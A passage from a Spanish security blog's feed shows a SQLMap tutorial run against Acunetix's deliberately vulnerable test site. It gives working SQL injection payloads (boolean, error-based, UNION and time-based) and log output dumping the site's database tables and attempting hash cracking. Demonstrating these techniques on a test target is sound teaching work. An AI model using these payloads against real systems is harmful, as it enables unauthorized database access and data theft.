    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL &gt; 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:56:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:56:34] [INFO] fetching tables for database: acuart
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
 acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
[16:56:34] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': sender,
 varchar(150), mesaj, text, senttime, int(32)
[16:56:34] [INFO] fetching entries for table 'guestbook' on database 'acuart'
[16:56:35] [WARNING] if the problem persists with 'None' values please try to use hidden switch 
--no-cast (fixing problems with some collation issues)
[16:56:35] [WARNING] the SQL query provided does not return any output
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: guestbook</span></strong>
<strong><span style="color:#ff0000;">[0 entries]</span></strong>
<strong><span style="color:#ff0000;">+-------+--------+----------+</span></strong>
<strong><span style="color:#ff0000;">| mesaj | sender | senttime |</span></strong>
<strong><span style="color:#ff0000;">+-------+--------+----------+</span></strong>
<strong><span style="color:#ff0000;">+-------+--------+----------+</span></strong>

<strong><span style="color:#ff0000;">[16:56:35] [INFO] Table 'acuart.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com
/dump/acuart/guestbook.csv'</span></strong>
<strong><span style="color:#ff0000;">[16:56:35] [INFO] fetching columns for table 'carts' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:56:35] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cart_id, 
varchar(100), price, int(11), item, int(11)</span></strong>
<strong><span style="color:#ff0000;">[16:56:35] [INFO] fetching entries for table 'carts' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">recognized possible password hashes in column cart_id. Do you want to crack them via a dictionary-based
 attack? [Y/n/q] y</span></strong>
<strong><span style="color:#ff0000;">[16:56:51] [INFO] using hash method 'md5_generic_passwd'</span></strong>
<strong><span style="color:#ff0000;">what dictionary do you want to use?</span></strong>
<strong><span style="color:#ff0000;">[1] default dictionary file (press Enter)</span></strong>
<strong><span style="color:#ff0000;">[2] custom dictionary file</span></strong>
<strong><span style="color:#ff0000;">[3] file with list of dictionary files</span></strong>

<strong><span style="color:#ff0000;">[16:57:04] [INFO] using default dictionary</span></strong>
<strong><span style="color:#ff0000;">[16:57:04] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'</span></strong>
<strong><span style="color:#ff0000;">do you want to use common password suffixes? (slow!) [y/N] n</span></strong>
<strong><span style="color:#ff0000;">[16:57:10] [INFO] starting dictionary-based cracking (md5_generic_passwd)</span></strong>
<strong><span style="color:#ff0000;">[16:57:46] [WARNING] no clear password(s) found </span></strong>
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: carts</span></strong>
<strong><span style="color:#ff0000;">[43 entries]</span></strong>
<strong><span style="color:#ff0000;">+----------------------------------+------------+-------+</span></strong>
<strong><span style="color:#ff0000;">| cart_id | item | price |</span></strong>
<strong><span style="color:#ff0000;">+----------------------------------+------------+-------+</span></strong>
<strong><span style="color:#ff0000;">| 59bc1b0b420b28ec09d673886c9e6c5e | 6 | 10000 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 0 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 59bc1b0b420b28ec09d673886c9e6c5e | 7 | 15000 |</span></strong>
<strong><span style="color:#ff0000;">| 103182aada3cc3df0f6eb53e12338805 | 3 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 62d636f894e9e726dc6a0300fd2aa2f3 | 3 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 407f7a7006ae7e1e290a0deef4adddca | 5 | 444 |</span></strong>
<strong><span style="color:#ff0000;">| 407f7a7006ae7e1e290a0deef4adddca | 2 | 1230 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | -268435455 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 59bc1b0b420b28ec09d673886c9e6c5e | 3 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 94e69794012f981ba39b45e3d67b9bb4 | 6 | 10000 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | -1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 3 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| ee7a540800a6314cb8e853294a3fd364 | -268435455 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 2 | 800 |</span></strong>
<strong><span style="color:#ff0000;">| 103182aada3cc3df0f6eb53e12338805 | 4 | 1000 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 6 | 10000 |</span></strong>
<strong><span style="color:#ff0000;">| ee7a540800a6314cb8e853294a3fd364 | 0 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 103182aada3cc3df0f6eb53e12338805 | 6 | 10000 |</span></strong>
<strong><span style="color:#ff0000;">| 103182aada3cc3df0f6eb53e12338805 | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 407f7a7006ae7e1e290a0deef4adddca | 7 | 1 |</span></strong>
<strong><span style="color:#ff0000;">| ee7a540800a6314cb8e853294a3fd364 | -1 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| fb410f050b45babb0fa88ae1c7e5dcce | 2 | 800 |</span></strong>
<strong><span style="color:#ff0000;">| 407f7a7006ae7e1e290a0deef4adddca | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 5 | 460 |</span></strong>
<strong><span style="color:#ff0000;">| 3fc1a7bc4d6afab0889708ed649f5e59 | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 59bc1b0b420b28ec09d673886c9e6c5e | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 59bc1b0b420b28ec09d673886c9e6c5e | 2 | 800 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 7 | 15000 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 4 | 1000 |</span></strong>
<strong><span style="color:#ff0000;">| ee7a540800a6314cb8e853294a3fd364 | 268435455 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 62d636f894e9e726dc6a0300fd2aa2f3 | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| ee7a540800a6314cb8e853294a3fd364 | 3 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 407f7a7006ae7e1e290a0deef4adddca | 6 | 123 |</span></strong>
<strong><span style="color:#ff0000;">| 357dce450e0ca7bd2d1c04f55905e10f | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 268435455 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 59bc1b0b420b28ec09d673886c9e6c5e | 4 | 1000 |</span></strong>
<strong><span style="color:#ff0000;">| a33e8f5069b5a8d7e6b579697bfaf96d | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 59bc1b0b420b28ec09d673886c9e6c5e | 5 | 460 |</span></strong>
<strong><span style="color:#ff0000;">| e8513b2f278260d085e29bc4491cdf0b | 2 | 8 |</span></strong>
<strong><span style="color:#ff0000;">| 94e69794012f981ba39b45e3d67b9bb4 | 3 | 986 |</span></strong>
<strong><span style="color:#ff0000;">| 92cd2d36a3ebf3e3227f8573f8682b98 | 1 | 500 |</span></strong>
<strong><span style="color:#ff0000;">| 62d636f894e9e726dc6a0300fd2aa2f3 | 2 | 800 |</span></strong>
<strong><span style="color:#ff0000;">| 9c7ab77a32a914594d838f1e657f56ab | 5 | 100 |</span></strong>
<strong><span style="color:#ff0000;">+----------------------------------+------------+-------+</span></strong>

<strong><span style="color:#ff0000;">[16:57:46] [INFO] Table 'acuart.carts' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/carts.csv'</span></strong>
<strong><span style="color:#ff0000;">[16:57:46] [INFO] fetching columns for table 'categ' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:57:46] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cat_id, int(5), cname, varchar(50), cdesc, tinytext</span></strong>
<strong><span style="color:#ff0000;">[16:57:46] [INFO] fetching entries for table 'categ' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: categ</span></strong>
<strong><span style="color:#ff0000;">[4 entries]</span></strong>
<strong><span style="color:#ff0000;">+--------+---------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
----------------------------------------------------------------+-----------+</span></strong>
<strong><span style="color:#ff0000;">| cat_id | cdesc | cname |</span></strong>
<strong><span style="color:#ff0000;">+--------+-------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------
--------------------------------------------------------+-----------+</span></strong>
<strong><span style="color:#ff0000;">| 1 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\n Cras venenati | Posters |</span></strong>
<strong><span style="color:#ff0000;">| 3 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\n Cras venenati | Stickers |</span></strong>
<strong><span style="color:#ff0000;">| 4 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. 
Nulla nonummy. Cras quis libero.\n Cras venenati | Graffity |</span></strong>
<strong><span style="color:#ff0000;">| 2 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. 
Cras quis libero.\n Cras venenati | Paintings |</span></strong>
<strong><span style="color:#ff0000;">+--------+---------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
-----------------------------------------+-----------+</span></strong>

<strong><span style="color:#ff0000;">[16:57:48] [INFO] Table 'acuart.categ' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump
/acuart/categ.csv'</span></strong>
<strong><span style="color:#ff0000;">[16:57:48] [INFO] fetching columns for table 'featured' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(11), 
feature_text, text</span></strong>
<strong><span style="color:#ff0000;">[16:57:48] [INFO] fetching entries for table 'featured' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:57:48] [WARNING] the SQL query provided does not return any output</span></strong>
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: featured</span></strong>
<strong><span style="color:#ff0000;">[0 entries]</span></strong>
<strong><span style="color:#ff0000;">+--------------+--------+</span></strong>
<strong><span style="color:#ff0000;">| feature_text | pic_id |</span></strong>
<strong><span style="color:#ff0000;">+--------------+--------+</span></strong>
<strong><span style="color:#ff0000;">+--------------+--------+</span></strong>

<strong><span style="color:#ff0000;">[16:57:48] [INFO] Table 'acuart.featured' dumped to CSV file '/pentest/database/sqlmap/output
/test.acunetix.com/dump/acuart/featured.csv'</span></strong>
<strong><span style="color:#ff0000;">[16:57:48] [INFO] fetching columns for table 'artists' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': 
artist_id, int(5), aname, varchar(50), adesc, text</span></strong>
<strong><span style="color:#ff0000;">[16:57:48] [INFO] fetching entries for table 'artists' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: artists</span></strong>
<strong><span style="color:#ff0000;">[3 entries]</span></strong>
<strong><span style="color:#ff0000;">+--------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
-+---------+-----------+</span></strong>
<strong><span style="color:#ff0000;">| adesc | aname | artist_id |</span></strong>
<strong><span style="color:#ff0000;">+---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------
---------------+---------+-----------+</span></strong>
<strong><span style="color:#ff0000;">| &lt;p&gt;\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\
nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean
 viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam
 lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n&lt;/p&gt;\n&lt;p&gt;\nLorem ipsum dolor sit amet, 
consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum 
condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis.
 Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio.
 Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent 
per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor
.\n&lt;/p&gt; | lyzae | 3 |</span></strong>
<strong><span style="color:#ff0000;">| &lt;p&gt;\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. 
Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\n 
Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra.
 Class aptent taciti sociosqu ad\n litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n 
Mauris magna eros, semper a, tempor et, rutrum et, tortor.\n&lt;/p&gt;\n&lt;p&gt;\nLorem ipsum dolor sit amet, consectetuer
 adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum 
facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam 
posuere lobortis pede. Nullam fringilla urna id leo.\n Praesent aliquet pretium erat. Praesent non odio. 
Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\n litora 
torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n Mauris magna eros, semper a, tempor et, 
rutrum et, tortor.\n&lt;/p&gt; | r4w8173 | 1 |</span></strong>
<strong><span style="color:#ff0000;">| &lt;p&gt;\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet
 pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent 
taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros,
 semper a, tempor et, rutrum et, tortor.\n&lt;/p&gt;\n&lt;p&gt;\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec
 molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse
 platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam
 fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris 
vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per 
inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n&lt;/p&gt; | Blad3 | 2 |</span></strong>
<strong><span style="color:#ff0000;">+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+-----------+</span></strong>

<strong><span style="color:#ff0000;">[16:57:49] [INFO] Table 'acuart.artists' dumped to CSV file '/pentest/database/sqlmap/output/
test.acunetix.com/dump/acuart/artists.csv'</span></strong>
<strong><span style="color:#ff0000;">[16:57:49] [INFO] fetching columns for table 'pictures' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id,
 int(5), pshort, mediumtext, plong, text, price, int(11), cat_id, int(11), a_id, int(11), title, varchar(100), 
img, varchar(50)</span></strong>
<strong><span style="color:#ff0000;">[16:57:49] [INFO] fetching entries for table 'pictures' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: pictures</span></strong>
<strong><span style="color:#ff0000;">[7 entries]</span></strong>
<strong><span style="color:#ff0000;">+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| a_id | cat_id | img | pic_id | plong | price | pshort | title |</span></strong>
<strong><span style="color:#ff0000;">+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| 2 | 1 | ./pictures/7.jpg | 7 | bla bla bla long | 15000 | bla bla bla | Trees |</span></strong>
<strong><span style="color:#ff0000;">| 1 | 2 | ./pictures/6.jpg | 6 | &lt;p&gt;\nThis picture is an 99 cm x 200 cm masterpiece.\
n&lt;/p&gt;\n&lt;p&gt;\nThis text is not meant to be read. This is being used as a place holder. 
Please feel free to change this by inserting your own information.This text is not meant to be read. 
This is being used as a place holder. Please feel free to change this by inserting your own information.
This text is not meant to be read. This is being used as a place holder. Please feel free to change this
 by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information. \n&lt;/p&gt; | 10000 | Lorem ipsum dolor sit
 amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin.\n | Thing |</span></strong>
<strong><span style="color:#ff0000;">| 1 | 1 | ./pictures/5.jpg | 5 | &lt;p&gt;\nThis picture is an 53 cm x 12 cm masterpiece.\n&lt;/p&gt;\n&lt;p&gt;\nThis text 
is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting
 your own information.This text is not meant to be read. This is being used as a place holder. Please feel free 
to change this by inserting your own information.This text is not meant to be read. This is being used as a place 
holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This 
is being used as a place holder. Please feel free to change this by inserting your own information. \n&lt;/p&gt; | 460 
| Lorem ipsum dolor sit amet, consectetuer adipiscing elit. | Mean |</span></strong>
<strong><span style="color:#ff0000;">| 1 | 1 | ./pictures/2.jpg | 2 | &lt;p&gt;\nThis picture is an 53 cm x 12 cm masterpiece.\n&lt;/p&gt;\n&lt;p&gt;\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your
 own information.This text is not meant to be read. This is being used as a place holder. Please feel free to 
change this by inserting your own information.This text is not meant to be read. This is being used as a place 
holder. Please feel free to change this by inserting your own information.This text is not meant to be read. 
This is being used as a place holder. Please feel free to change this by inserting your own information. \n&lt;/p&gt; 
| 800 | Donec molestie.\nSed aliquam sem ut arcu. | Mistery |</span></strong>
<strong><span style="color:#ff0000;">| 1 | 1 | ./pictures/1.jpg | 1 | &lt;p&gt;\nThis picture is an 53 cm x 12 cm masterpiece.\n&lt;/p&gt;\n&lt;p&gt;\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your 
own information.This text is not meant to be read. This is being used as a place holder. Please feel free to 
change this by inserting your own information.This text is not meant to be read. This is being used as a place
 holder. Please feel free to change this by inserting your own information.This text is not meant to be read. 
This is being used as a place holder. Please feel free to change this by inserting your own information. \n&lt;/p&gt; 
| 500 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. |
 The shore |</span></strong>
<strong><span style="color:#ff0000;">| 1 | 1 | ./pictures/4.jpg | 4 | &lt;p&gt;\nThis picture is an 53 cm x 12 cm masterpiece.\n&lt;/p&gt;\n&lt;p&gt;\nThis text is not
 meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own 
information.This text is not meant to be read. This is being used as a place holder. Please feel free to change
 this by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information.This text is not meant to be read. This is being
 used as a place holder. Please feel free to change this by inserting your own information. \n&lt;/p&gt; | 1000 | Lorem 
ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin
.\n | Walking |</span></strong>
<strong><span style="color:#ff0000;">| 1 | 1 | ./pictures/3.jpg | 3 | &lt;p&gt;\nThis picture is an 53 cm x 12 cm masterpiece.\n&lt;/p&gt;\n&lt;p&gt;\nThis text is not 
meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n&lt;/p&gt; | 986 | Lorem ipsum dolor sit amet. Donec molestie.\nSed aliquam sem ut arcu. | The universe |</span></strong>
<strong><span style="color:#ff0000;">+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+</span></strong>

[16:57:49] [INFO] Table 'acuart.pictures' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.
com/dump/acuart/pictures.csv'
[16:57:49] [INFO] fetching columns for table 'users' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': uname, 
varchar(100), pass, varchar(100), cc, varchar(100), address, mediumtext, email, varchar(100), name, varchar(100)
, phone, varchar(100), cart, varchar(100)
[16:57:49] [INFO] fetching entries for table 'users' on database 'acuart'

[16:58:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

^C
[17:01:59] [ERROR] user aborted

[*] shutting down at 17:01:59</pre>
<p>Volvéis a tener en rojo la información extraída.</p>
<p>Hasta aquí un pequeño repaso de SQLMap <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/backtrack/'>Backtrack</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/backtrack/'>Backtrack</a>, <a href='http://seifreed.com/tag/bases-de-datos/'>bases de datos</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/sqlmap/'>SQLMap</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3870/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3870/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3870/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3870/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3870/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3870/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3870/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3870/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3870/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3870/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3870/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3870/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3870/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3870/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3870&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/08/18/sqlmap/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>SET social engineering toolkit</title>
		<link>http://seifreed.com/2011/07/22/set-social-engineering-toolkit/</link>
		<comments>http://seifreed.com/2011/07/22/set-social-engineering-toolkit/#comments</comments>
		<pubDate>Fri, 22 Jul 2011 14:50:40 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[SET]]></category>
		<category><![CDATA[social engineering toolkit]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3851</guid>
